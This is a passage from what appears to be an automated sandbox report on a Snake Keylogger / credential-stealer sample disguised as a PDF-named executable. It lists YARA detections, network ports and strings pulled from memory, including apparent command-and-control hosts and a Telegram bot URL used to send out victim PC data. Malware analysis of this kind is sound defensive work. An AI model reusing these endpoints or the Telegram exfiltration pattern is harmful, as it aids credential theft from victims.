                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000000.00000002.2042995856.0000000004672000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4499590469.0000000000402000.00000040.00000400.00020000.00000000.sdmp, rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4501375928.0000000003091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4501375928.0000000003091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4501375928.0000000003091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000000.00000002.2042995856.0000000004672000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4499590469.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4501375928.0000000003091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000000.00000002.2042995856.0000000004672000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4499590469.0000000000402000.00000040.00000400.00020000.00000000.sdmp, rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4501375928.0000000003091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.00000000040B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4501375928.0000000003178000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000000.00000002.2042995856.0000000004672000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4501375928.0000000003178000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4499590469.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4501375928.0000000003178000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4501375928.0000000003178000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:414408%0D%0ADate%20a
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.00000000040B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.00000000040B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.00000000040B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4501375928.0000000003255000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4501375928.0000000003246000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4501375928.0000000003286000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4501375928.0000000003246000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enh
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4501375928.0000000003250000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.00000000040B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.00000000040B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.00000000040B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4501375928.0000000003178000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4501375928.00000000030E2000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4501375928.0000000003151000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000000.00000002.2042995856.0000000004672000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4499590469.0000000000402000.00000040.00000400.00020000.00000000.sdmp, rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4501375928.00000000030E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4501375928.000000000310C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4501375928.0000000003178000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4501375928.0000000003151000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4501375928.000000000310C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.00000000040B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4503950128.00000000040B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4501375928.0000000003286000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4501375928.0000000003277000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/h
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4501375928.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49726 version: TLS 1.2

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 3.2.rDEKONT-1_15_2025__75kb__pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 3.2.rDEKONT-1_15_2025__75kb__pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 3.2.rDEKONT-1_15_2025__75kb__pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.rDEKONT-1_15_2025__75kb__pdf.exe.49b6238.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.rDEKONT-1_15_2025__75kb__pdf.exe.49b6238.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.rDEKONT-1_15_2025__75kb__pdf.exe.49b6238.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.rDEKONT-1_15_2025__75kb__pdf.exe.49b6238.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.rDEKONT-1_15_2025__75kb__pdf.exe.49b6238.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.rDEKONT-1_15_2025__75kb__pdf.exe.49b6238.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.rDEKONT-1_15_2025__75kb__pdf.exe.492e818.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.rDEKONT-1_15_2025__75kb__pdf.exe.492e818.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.rDEKONT-1_15_2025__75kb__pdf.exe.48a6df8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.rDEKONT-1_15_2025__75kb__pdf.exe.48a6df8.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000003.00000002.4499590469.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000000.00000002.2042995856.0000000004672000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: rDEKONT-1_15_2025__75kb__pdf.exe PID: 384, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: rDEKONT-1_15_2025__75kb__pdf.exe PID: 320, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Initial sample is a PE file and has a suspicious name
                  Source: initial sampleStatic PE information: Filename: rDEKONT-1_15_2025__75kb__pdf.exe
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 0_2_02CC42240_2_02CC4224
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 0_2_02CC7D980_2_02CC7D98
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 0_2_060CF4000_2_060CF400
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 0_2_060C80B80_2_060C80B8
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 0_2_060CFB580_2_060CFB58
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 0_2_060CE8C10_2_060CE8C1
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 0_2_060C85B30_2_060C85B3
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 0_2_060C12F80_2_060C12F8
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 0_2_060CF3AA0_2_060CF3AA
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 0_2_060CF3CF0_2_060CF3CF
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 0_2_060CF3E60_2_060CF3E6
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 0_2_08275B300_2_08275B30
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 0_2_082740880_2_08274088
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 0_2_082744C80_2_082744C8
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 0_2_082705B00_2_082705B0
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 0_2_082738080_2_08273808
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 0_2_082738180_2_08273818
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 0_2_082769B80_2_082769B8
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 0_2_082769C80_2_082769C8
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 0_2_08274A680_2_08274A68
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 0_2_08274A580_2_08274A58
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 0_2_08273A810_2_08273A81
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 0_2_08273A900_2_08273A90
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 0_2_08275B230_2_08275B23
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 0_2_0827DBA80_2_0827DBA8
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 0_2_0827DB980_2_0827DB98
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 0_2_08274EAB0_2_08274EAB
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 0_2_08274EB00_2_08274EB0
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 0_2_08272F680_2_08272F68
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 0_2_08272F590_2_08272F59
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 0_2_0827DFE00_2_0827DFE0
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 0_2_082700060_2_08270006
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 0_2_0827407B0_2_0827407B
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 0_2_082700400_2_08270040
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 0_2_082723A80_2_082723A8
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 0_2_082723B80_2_082723B8
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 0_2_082763E00_2_082763E0
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 0_2_082763D10_2_082763D1
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 0_2_0827E4180_2_0827E418
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 0_2_082744B80_2_082744B8
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 0_2_082705A00_2_082705A0
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 0_2_082735E80_2_082735E8
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 0_2_082735F80_2_082735F8
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 0_2_0827A6E20_2_0827A6E2
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 0_2_082747030_2_08274703
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 0_2_082747100_2_08274710
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 0_2_0827D7500_2_0827D750
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_0147C1473_2_0147C147
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_014753703_2_01475370
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_0147D27F3_2_0147D27F
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_0147C4733_2_0147C473
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_0147C7383_2_0147C738
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_0147E9883_2_0147E988
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_014769AF3_2_014769AF
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_0147CA0F3_2_0147CA0F
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_0147CCDF3_2_0147CCDF
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_01476FC83_2_01476FC8
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_0147CFA93_2_0147CFA9
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_0147F6303_2_0147F630
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_014729EC3_2_014729EC
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_0147E9873_2_0147E987
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_0147FA8B3_2_0147FA8B
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_01473AA13_2_01473AA1
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_01473E093_2_01473E09
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06D1A4683_2_06D1A468
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06D1AB503_2_06D1AB50
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06D10B303_2_06D10B30
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06D19D103_2_06D19D10
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06D1F8683_2_06D1F868
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06D1E6F83_2_06D1E6F8
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06D1E7083_2_06D1E708
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06D1A4633_2_06D1A463
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06D182583_2_06D18258
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06D182683_2_06D18268
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06D100403_2_06D10040
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06D1003F3_2_06D1003F
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06D1E1783_2_06D1E178
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06D1E1683_2_06D1E168
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06D1EFB83_2_06D1EFB8
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06D1EFA93_2_06D1EFA9
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06D1EB603_2_06D1EB60
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06D1EB623_2_06D1EB62
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06D10B273_2_06D10B27
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06D1D4703_2_06D1D470
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06D1F4103_2_06D1F410
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06D1F4123_2_06D1F412
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06D1DD113_2_06D1DD11
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06D19D003_2_06D19D00
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06D1DD203_2_06D1DD20
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06D1D8C83_2_06D1D8C8
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06D1D8BD3_2_06D1D8BD
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06D1F8673_2_06D1F867
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DBD6203_2_06DBD620
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DBDCC03_2_06DBDCC0
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB56983_2_06DB5698
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB36983_2_06DB3698
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB76883_2_06DB7688
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB56883_2_06DB5688
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB36A83_2_06DB36A8
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DBE6503_2_06DBE650
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DBE6413_2_06DBE641
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB96403_2_06DB9640
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB76783_2_06DB7678
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DBB61F3_2_06DBB61F
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB0E103_2_06DB0E10
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DBD60F3_2_06DBD60F
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DBB6303_2_06DBB630
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB96303_2_06DB9630
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB0E203_2_06DB0E20
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB3FC83_2_06DB3FC8
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DBEFCF3_2_06DBEFCF
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DBEFE03_2_06DBEFE0
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB7F993_2_06DB7F99
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB5FB83_2_06DB5FB8
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB3FB83_2_06DB3FB8
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB7FA83_2_06DB7FA8
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB5FA83_2_06DB5FA8
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DBBF503_2_06DBBF50
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB9F503_2_06DB9F50
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DBBF413_2_06DBBF41
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB9F603_2_06DB9F60
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DBCCF03_2_06DBCCF0
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DBF4983_2_06DBF498
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DBDCBD3_2_06DBDCBD
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DBF4A83_2_06DBF4A8
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB44583_2_06DB4458
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB64483_2_06DB6448
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB44473_2_06DB4447
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB84383_2_06DB8438
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB64373_2_06DB6437
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB84273_2_06DB8427
